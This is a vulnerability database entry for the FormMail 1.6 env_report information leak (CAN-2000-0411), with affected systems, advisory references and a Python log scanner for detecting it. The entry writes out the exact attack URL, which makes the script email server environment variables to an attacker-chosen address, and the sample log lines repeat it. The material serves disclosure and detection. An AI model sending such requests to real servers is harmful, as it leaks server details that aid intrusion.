Brief description: An unauthorized remote user can obtain CGI environment variable information from a web server running Matt Wright's FormMail by requesting a specially formed URL that specifies the email address to send the details to.
Full description: CGI environment variables may be accessed remotely by naming a particular variable, such as PATH, DOCUMENT_ROOT or SERVER_PORT, in the specially formed URL; the script emails the results to the address given. The information obtained could be used to assist in a future attack.
Components: Matt Wright FormMail 1.6 (trusted)
Systems: Sun SunOS 4.1.4 (trusted), Sun Solaris 8.0 (trusted), SGI IRIX 6.5.6 (trusted), SCO Unixware 7.1.1 (trusted), OpenBSD OpenBSD 2.6 (trusted), NetBSD NetBSD 1.3.3 (trusted), Linux kernel 2.3.x (trusted), Linux kernel 2.2.x, RedHat Linux 6.2 sparc (trusted), RedHat Linux 6.2 i386 (trusted), RedHat Linux 6.2 alpha (trusted), IBM AIX 4.3.2 (trusted), HP HP-UX 11.4 (trusted), FreeBSD FreeBSD 5.0 (trusted), Digital (Compaq) TRU64/DIGITAL UNIX 4.0f (trusted)
Effect(s) of exploiting: Environment variables are exposed.
Detecting the hole:
Fixing the hole:
Other information:
PA Classification(s):
RISOS Classification(s):
DCS Classification(s):
CVE Number: CAN-2000-0411 -- Matt Wright's FormMail CGI script allows remote attackers to obtain environmental variables via the env_report parameter.
Attack: Request the following URL from the target's server:
http://target.host/cgibin/formmail.cgi?env_report=PATH&recipient=<email address>&required=&firstname=&lastname=&email=&message=&Submit=<message>
This URL request assumes that the formmail.cgi script is located in the cgibin directory.
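A defender-side check for the request described above, as an added example that is not part of the original entry: it scans web server access logs for GET requests that pass env_report to a FormMail script and reports which variables were asked for and where the results were to be mailed. The Common Log Format, the rule that the script name contains "formmail", and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client, request target and status from a Common Log Format line (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def find_env_report_requests(log_lines):
    """Return one dict per logged request that passes env_report to FormMail."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # Assumption: the script file name contains "formmail" in any letter case.
        if "formmail" not in parts.path.lower():
            continue
        # parse_qsl percent-decodes names and values, so "env%5Freport" is caught too.
        params = parse_qsl(parts.query, keep_blank_values=True)
        requested = [v for k, v in params if k == "env_report"]
        if not requested:
            continue
        hits.append({
            "client": m.group("client"),
            "status": int(m.group("status")),
            # One env_report value may name several variables, comma separated.
            "variables": [n for v in requested for n in v.split(",") if n],
            "recipients": [v for k, v in params if k == "recipient"],
        })
    return hits

# Constructed sample log lines (documentation addresses and domains).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2000:01:20:00 +0000] "GET /cgibin/formmail.cgi'
    '?env_report=PATH&recipient=someone%40example.org&required=&Submit=x HTTP/1.0" 200 512',
    '192.0.2.11 - - [10/May/2000:01:21:00 +0000] "GET /cgi-bin/FormMail.pl'
    '?env%5Freport=DOCUMENT_ROOT,SERVER_PORT&recipient=a%40example.net HTTP/1.0" 200 498',
    '192.0.2.12 - - [10/May/2000:01:22:00 +0000] "GET /cgibin/formmail.cgi'
    '?recipient=webmaster%40example.org&message=hi HTTP/1.0" 200 301',
    '192.0.2.13 - - [10/May/2000:01:23:00 +0000] "GET /index.html?env_report=PATH HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for hit in find_env_report_requests(SAMPLE_LOG):
        print(hit)
```

Only query-string (GET) requests show up this way; a POST that carries env_report in its body leaves no parameter trace in a standard access log.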
Advisories: See the posting to Bugtraq; BugTraq ID 1187 (from which the above analysis came); Black Watch Labs Vulnerability Alert; and the X-Force entry XF:http-cgi-formmail-environment
Related Vulnerabilities:
Reporting: Vulnerability originally posted to the BugTraq mailing list on May 10, 2000 by Black Watch Labs, message ID 3919EC9B.2347576C@perfectotech.com (Wed May 10 2000 01:11:23)